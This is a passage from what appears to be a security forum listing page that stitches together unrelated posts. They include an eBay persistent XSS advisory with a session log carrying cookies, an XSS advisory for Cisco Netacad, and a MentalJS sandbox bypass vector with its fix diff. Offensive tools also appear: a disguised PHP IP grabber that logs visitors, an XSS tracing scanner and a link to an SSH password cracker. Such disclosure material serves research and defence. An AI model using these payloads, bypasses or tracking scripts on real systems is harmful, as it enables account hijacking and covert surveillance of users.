class="fourth">Report</th> </tr></thead></table> Note: After the exploitation the active log serivce is also compromised. --- PoC Session Logs [GET] --- Status: 200[OK] GET http://www.bizpolicy.ebay.com/businesspolicy/x[PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_NORMAL] Gr???e des Inhalts[1201] Mime Type[text/html] Request Header: Host[www.bizpolicy.ebay.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1] Cookie[ebay=%5Epsi%3DASTJiAAE*%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D53273c55%5E; dp1=ba1p/053289001^bl/DE56e9a581^kms/in56e9a581^reg/%5EflagReg%3D1%5E56e9a581^pcid/159931376355087201^mpc/0%7C7753346d81^pbf/%2340000000000081a88200000455087201^tzo/-3c53274c91^exc/0%3A0%3A0%3A0534ecb81^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55087201^u1f/Benjamin55087201^idm/153274c6b^; s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMokAEwAWUAAlMokAEjMgAGAAFTKJABMACoAAFTKHhdMQFKABhTKJABNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMokAExMjI1NjM3OTA2AO4AflMokAExBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZW5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiQAXRlc3RDb29raWUA9AAiUyiQASQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiQAWQwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnP60xMzk1MDc5MzUwOjAAPQAKUyiQATIwMTQua3Vuem3M/bEjO3QgStCZxGHoMG4FWaj2Rg**; nonsession=BAQAAAUSucEmyAAaAAEAAClUIcgEyMDE0Lmt1bnptAWQAA1UIcgEjOGEABAAKVQhaXTIwMTQua3Vuem0AygAgXI1AAWM3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnRYkyMQFMABhVCHIBNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIcgE1MzI3M2RkMi4wLjEuMi4xMzYuMC4wLjIAEAAKVQhyATIwMTQua3Vuem0AMwAJVQhyATM0MTI4LERFVQDzACJVCHIBJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4AnAA4VQhyAW5ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIcgEwMDAwMDAwMYEG3noCCpfEtIJDQA4W2mCUvROF; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55087201^cguid/c77cfce61440a56b23d61f96fe2e024155087201^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIcgExMjI1NjM3OTA2LzA7Z/0uwdxIwLmpExj/Whb9VGXz2oM*; secses=BAQAAAUSucEmyAAaAAUsAGFUIcgE1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJdgCSPs+1ulBCbABPTM3Q2B4zn6g**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; JSESSIONID=D0F0865539CABCE246EB953E8860B953; ds2=asotr/b7qeZzzzzzzz^sotr/b7qeZzzzzzzz^] Connection[keep-alive] Response Header: rlogid[t6al%7Cwliodz%3F%3Cwk%7D1e37e*%3B27c-144d14de1b3-0x96] Content-Type[text/html;charset=utf-8] Content-Length[1201] Date[Mon, 17 Mar 2014 18:29:05 GMT] Server[eBay Server] Reference(s): http://www.ebay.com/businesspolicy/ http://www.bizpolicy.ebay.com/businesspolicy/return http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName= http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage http://www.bizpolicy.ebay.com/businesspolicy/manage?pageNumber=1&totalPages=1&context={%22status%22%3A%22success_edit_return%22} http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage http://www.bizpolicy.ebay.com/businesspolicy/ http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1 Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure encode and parse of the vulnerable policy name item list and activity log name list. Restrict the input field for special character and disallow wrong inputs by usage of a secure exception-handling to prevent exections. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the policy name & activity-log module is estimated as medium. (CVSS 4.0) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright Š 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â? -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source: http://packetstorm.wowhacker.com/1504-exploits/VL-1228.txt
-
- domain=.ebay.com;
- injected
-
(and 3 more)
Tagged with:
-
EN: This is a php script that uses a pre-defined set of possible passwords and tries them against a given ssh server. RO: Acesta este un script php care foloseste un set predefinit de posibile parole ?i le încearc? impotriva unui server ssh dat P.S dac? e am s? il testez ?i am s? revin cu mai multe informa?ii despre el. Download: Download: T35T-SSH Password Cracker / Scanner ? Packet Storm
-
English | ISBN-13: 978-1466592612 | 532 pages | PDF | 23 MB In this book, web security expert Wu Hanqing reveals how hackers work and explains why companies of different scale require different security methodologies. With in-depth analysis of the reasons behind the choices, the book covers client script security, server applications security, and Internet company security operations. It also includes coverage of browser security, cross sites script attacks, click jacking, HTML5/PHP security, injection attacks, authentication, session management, access control, web frame security, DDOS, leaks, Internet transactions security, and the security development lifecycle. Link : Dropbox - Web Security: A WhiteHat Perspective
-
hi,hi,hi! ce imbunatatiri as putea aduce la acest script sa fie mai eficient, mai simplu de utilizat? index.php <?php #Ip(Internet Protocol) grabber for Yahoo!Messenger and other social softwares by #shadow #Version: 0.1 - beta #MA CULC ODATA CU GAINILE SI DE 1337 DE ORI CU MA-TA //show image $imagine = 'anonymous.jpg'; header('Content-Type: image/jpeg'); readfile($imagine); //mysql connect $mysql = mysqli_connect("localhost", "root", "", "test"); // verifica conexiunea if($mysql === false){ die("ERROR: Could not connect. " . mysqli_connect_error()); } //prelucreaza datele $ip = $_SERVER['REMOTE_ADDR']; //ip-ul victimei $time = date('Y-m-d H:i:s'); //data si ora la care a fost luat ip-ul $browser=""; // BROWSER if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("MSIE"))){$browser="ie";} else if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("Presto"))){$browser="opera";} else if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("CHROME"))){$browser="chrome";} else if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("SAFARI"))){$browser="safari";} else if(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),strtolower("FIREFOX"))){$browser="firefox";} else {$browser="other";}//browser //INSEREAZA DATELE IN BAZA DE DATE. $sql = "INSERT INTO data (ip, time, browser) VALUES ('<font color=grey><b>$ip', '<font color=grey><b>$time', '<font color=grey><b>$browser')"; if(mysqli_query($mysql, $sql)){ #SUCCES } ?> PANEL.PHP <body > <?php $db_host = 'localhost'; $db_user = 'root'; $db_pwd = ''; $database = 'test'; $table = 'data'; if (!mysql_connect($db_host, $db_user, $db_pwd)) die("Can't connect to database"); if (!mysql_select_db($database)) die("Can't select database"); // sending query $result = mysql_query("SELECT * FROM {$table}"); if (!$result) { die("Query to show fields from table failed"); } $fields_num = mysql_num_fields($result); echo "<center><table border='1'><tr>"; // printing table headers for($i=0; $i<$fields_num; $i++) { $field = mysql_fetch_field($result); echo "<td>{$field->name}</td>"; } echo "</tr>\n"; // printing table rows while($row = mysql_fetch_row($result)) { echo "<tr>"; // $row is array... foreach( .. ) puts every element // of $row to $cell variable foreach($row as $cell) echo "<td>$cell</td>"; echo "</tr>\n"; } mysql_free_result($result); ?> </body></html> m-am mai inspirat si dupa google dar nu copy/paste ci doar informativ despre functii
-
Amazon has patched dangerous cross-site scripting (XSS) vulnerability in its website that exposed accounts to hijacking. A Brazilian hacker using the handle @bruteLogic published the then-zero-day flaw to XSSposed.org Saturday without tipping off the book giant. Amazon swatted the flaws two days later. The time between disclosure and patch opened what the hacker told Beta News was a chance for Amazon accounts to be compromised and web browsers exploited. His reasoning for full disclosure was that Amazon did not pay cash for bug bounty reports. He says the vulnerability allowed attacks to view Amazon user credit cards and to purchase items in their name, provided a victim clicked on a crafted malicious link. Amazon has been contacted for comment. Cross-site scripting vulnerabilities are a persistent scourge on internet assets. It allows attackers to quietly target victims using vulnerable web applications that do not properly check input. The Open Web Application Security Project puts XSS as the third worst application security blunder behind broken authentication and injection. The web hole follows Amazon's September kerfuffle after it reintroduced a flaw in its Kindle management page that could have allowed attackers to inject malcode into a book's title which could have commandeered accounts. Source
-
http://s.go.ro/4lpjx
- 4 replies
-
- ddos
- http://s.go.ro/4lpjx
-
(and 1 more)
Tagged with:
-
########################### #Exploit Title: # Script Cisco Network Academy - Stored XSS vulnerability #Date: 017/03/2015 #Author: kabanni bntdzdz@gmail.com #Product web page: www.cisco.com #Tested on: Windows 8.1 #OSVDB-ID: ########################### 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1 ______ 0 0 .-" "-. 1 1 / HaChkerz_Dz \ =-=-=-=-=-=-=-=-=-=-=-=| 0 0 Algerian HaCker | | > Site : GDGBordj.org | 1 1 --------------- |, .-. .-. ,| > fb : @kabanni | 0 0 | )(_o/ \o_)( | > [email]kacily2008@gmail.com[/email]| 1 1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=-| 0 0 (@_ (_ ^^ _) 0X00 Team 1 1 _ ) \_______\__|IIIIII|__/_______________________ 0 0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1 1 )_/ \ / 0 0 (@ `--------` 2015, 0x00 Team 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 Script Cisco Network Academy XSS vulnerability 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 ########################## Description A vulnerability in the web framework of Cisco Netacad could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface on the affected system. The vulnerability is due to insufficient input validation of several parameters in the input fields Quarantine web page. An attacker could exploit this vulnerability by persuading a user to access a malicious link. # Sample Payload for Stored XSS: "<script>alert(0);</script> " # Solution Fix & Patch: Filter the input fields aganist to XSS attacks & Upgrade the the script. #Security Risk: The risk of the vulnerabilities above estimated as high. #Proof of Concept (PoC): <input type="TEXT" maxlength="250" size="50" name="ANSWERrt_239101" disabled=""> #Details of the attack: The web site netacd.com , is allowed to the users pass the exams of CCNA . The questions compose in many format like Check box , Radio , and Input field . When enter the code malicious to a question witch content an input field , finally if submit the answers ,and when go to show the assessment , the user appear a message java script . --==[[ Greetz To ]]==-- ############################################################################################ #0x00 , Alhack , Mr.elhdj Google , Hakim_Ghorb , Mohamed Ramaden , Team Anonymous . #Mr.Zaki ,Dr.Ben Taleb,Nas_unknown ,Dahmani,Good_person ,Boud_Sah ,Moh_Dz ,Yass_assasine. #Amin-Biskra , Bouhlel ,Meliani, Najmo & All students TIC & Informatics at Univ-Msila ############################################################################################# --==[[Love to]]==-- # My Father & Mother ,All Kacem(bira9i9) ,my Ex Teacher , My wife . --==[[ All Muslims Hachers ]]==-- <3 0x00 Team <3 Source
-
Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions. The vector is below:- _=document x =_.createElement('script'); s =_.createElement('style') s.innerHTML = '*/alert(location)//' t=_.createElement('b') t.textContent = '/*' x.insertBefore(t.firstChild, null); x.insertBefore(s, null) _.body.appendChild(x) x =_.createElement('script'); s =_.createElement('style') s.innerHTML = _.getElementsByTagName('script')[2].textContent x.insertBefore(s.firstChild, null) _.body.appendChild(x) It can actually be compressed to the following: s=document.createElement('script'); s.insertBefore(document.createTextNode('alert(location)'),null); document.body.appendChild(s); The fix was to check if the second argument is null and the parent node is a script. Clean the script and then sandbox the code. Hopefully that will fix the attack, I couldn’t see a way to use insertBefore without a null argument to cause another bypass. @@ -5621,7 +5621,7 @@ } }; - exports.version = "0.1.15"; + exports.version = "0.1.16"; exports.parse = function(){ var js = MentalJS(); }; @@ -5873,9 +5873,7 @@ if(this.tagName && this.tagName.toUpperCase() == 'SCRIPT') { while(this.firstChild) { this.removeChild(this.firstChild); - } - } - if(this.tagName && this.tagName.toUpperCase() === 'SCRIPT') { + } js = MentalJS(); code = document.createTextNode(js.parse({options:{eval:false},code:node.textContent})); script = document.createElement('script'); @@ -5895,7 +5893,18 @@ 'lastChild$': {configurable:true, get:function(){return this.lastChild;}}, 'nextSibling$': {configurable:true, get:function(){return this.nextSibling;}}, 'parentNode$': {configurable:true, get:function(){return this.parentNode;}}, - 'insertBefore$': {configurable:true, writable:false, value:function(){return this.insertBefore.apply(this, arguments);}}, + 'insertBefore$': {configurable:true, writable:false, value:function(newElement, referenceElement){ + var js, script; + if(this.tagName && this.tagName.toUpperCase() == 'SCRIPT' && referenceElement === null) { + while(this.firstChild) { + this.removeChild(this.firstChild); + } + js = MentalJS(); + code = document.createTextNode(js.parse({options:{eval:false},code:newElement.textContent})); + return this.insertBefore(code, null); + } + return this.insertBefore.apply(this, arguments);} + }, 'cloneNode$': {configurable:true, writable:false, value:function(){return this.cloneNode.apply(this, arguments);}}, 'removeChild$': {configurable:true, writable:false, value:function(){return this.removeChild.apply(this, arguments);}}, 'removeAttribute$': {configurable:true, writable:false, value:function(name){ this.removeAttribute(name); }}, @@ -6175,7 +6184,8 @@ Object.defineProperties(HTMLStyleElement.prototype, { 'innerText$': {configurable:true, get:function(){return this.innerText;},set:function(innerText){ this.innerText = innerText; }}, 'textContent$': {configurable:true, get:function(){return this.textContent;},set:function(textContent){this.textContent=textConent;}}, - 'text$': {configurable:true, get:function(){return this.text;},set:function(text){ this.text=text; }} + 'text$': {configurable:true, get:function(){return this.text;},set:function(text){ this.text=text; }}, + 'innerHTML$': {configurable:true, get:function(){return this.innerHTML;},set:function(){ }} }); Object.defineProperties(document, { Source
-
- configurabletrue
- getfunctionreturn
-
(and 3 more)
Tagged with:
-
<?php $random=rand(0,100000000000); $md5=md5("$random"); $base=base64_encode($md5); $dst=md5("$base"); function recurse_copy($src,$dst) { $dir = opendir($src); @MkDir($dst); while(false !== ( $file = readdir($dir)) ) { if (( $file != '.' ) && ( $file != '..' )) { if ( is_dir($src . '/' . $file) ) { recurse_copy($src . '/' . $file,$dst . '/' . $file); } else { copy($src . '/' . $file,$dst . '/' . $file); } } } closedir($dir); } $src="home"; recurse_copy( $src, $dst ); header("location:$dst"); ?>
-
#!/usr/bin/python # Cross-Site Tracer by 1N3 v20150224 # https://crowdshield.com # # ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, create a list of domains or IP addresses to iterate through by running 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;' # # USAGE: xsstracer.py <IP/host> <port> # import socket import time import sys, getopt class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def main(argv): argc = len(argv) if argc <= 2: print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC sys.exit(0) target = argv[1] # SET TARGET port = argv[2] # SET PORT buffer1 = "TRACE / HTTP/1.1" buffer2 = "Test: <script>alert(1);</script>" buffer3 = "Host: " + target print "" print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 " print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com" print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) result=s.connect_ex((target,int(port))) s.settimeout(1.0) if result == 0: s.send(buffer1 + "\n") s.send(buffer2 + "\n") s.send(buffer3 + "\n\n") data = s.recv(1024) script = "alert" if script.lower() in data.lower(): print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC print "" print bcolors.WARNING + data + bcolors.ENDC else: print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!" print "" print "" else: print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC s.close() main(sys.argv) Download Source
-
- argc
- cross-site
-
(and 3 more)
Tagged with: